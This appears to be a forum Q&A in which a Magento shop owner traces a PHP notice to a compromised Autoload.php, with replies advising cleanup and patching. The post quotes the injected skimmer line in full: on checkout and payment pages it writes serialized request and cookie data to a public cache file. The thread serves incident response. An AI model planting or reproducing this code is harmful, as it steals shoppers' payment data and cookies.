Reputation: 53
Mage PHP Notice: Undefined index: REQUEST_URI in /htdocs/lib/Varien/Autoload.php on line 1
Since this morning I'm getting the following PHP Notice after running the Magento cronjob:
Undefined index: REQUEST_URI in /htdocs/lib/Varien/Autoload.php on line 1
I did not modify any of the mage files.. How is this possible?
EDIT: For now I've edited the Autoload.php to first check if the REQUEST_URI is set.
Original:
<?php if(preg_match("/checkout|payment/", $_SERVER["REQUEST_URI"]))
New:
<?php if(isset($_SERVER["REQUEST_URI"]) && preg_match("/checkout|payment/", $_SERVER["REQUEST_URI"]))
EDIT 30-04-2015:
After reading @volkan and @b.enoit.be comments I've immediately replaced the specified page with the original one from Magento and the line was indeed not present!.
The following was the malicious line present in Autoload.php
<?php if(preg_match("/checkout|payment/", $_SERVER["REQUEST_URI"])){@file_put_contents(realpath("./")."/media/catalog/product/cache_catalogs", @base64_encode(serialize($_REQUEST)."--".serialize($_COOKIE)). ":", FILE_APPEND); }?>
I've also checked:
- /js/index.php same as original
- /index.php same as original
- Magpleasure_Filesystem module was not present
However.. there were two new admin-users which had obscure names:
- backup - [email protected] <-- this domain leads to a domain holding page and the email gives Russian results on Google
- database - [email protected]
Both users have been deleted. The website was also vulnerable tot the shoplift exploit (which is addressed in the latest security-patch)
We're currently busy installing the latest security patches.
It seems that this has been a recent problem:
100,000 web shops open to compromise as attackers exploit Magento bug Magento Shoplift Bug Tester v1.0
Thanks to all users for there help.
Upvotes: 5
Views: 5751
Answers (2)
Reputation: 1
This is definitely a compromised file.
If anybody else encounters the same problem, media/catalog/product/cache_catalogs file should be deleted as well, because it contains sensitive data (requests and cookies data from checkout or payment pages) and it is publicly accessible (in media/ folder).
Upvotes: 0
Reputation: 26
it looks like that your page has been compromised, replace the file with the original one, and install the security patches for magento. Check if there are some new admin-users in the backend, and for the module Magpleasure_Filesystem
check also /js/index.php /index.php
Upvotes: 1
Related Questions
- Notice: Undefined index php $_request
- PHP Notice: Undefined index: HTTP_HOST in /var/.../script.php on line 8
- Notice: Undefined index: in C:\wamp\www\tests\Joomla\Website\index.php on line 37
- PHP Notice: Undefined index
- fatal error Varien_Autoload not found
- How to solve "Notice: Undefined index: ..."
- Notice: Undefined index: elegido in C:\xampp\htdocs\cars\index1.php on line
- PHP Notice: Undefined index: url
- How to solve php Notice: Undefined index
- PHP notice - Undefined index on index.php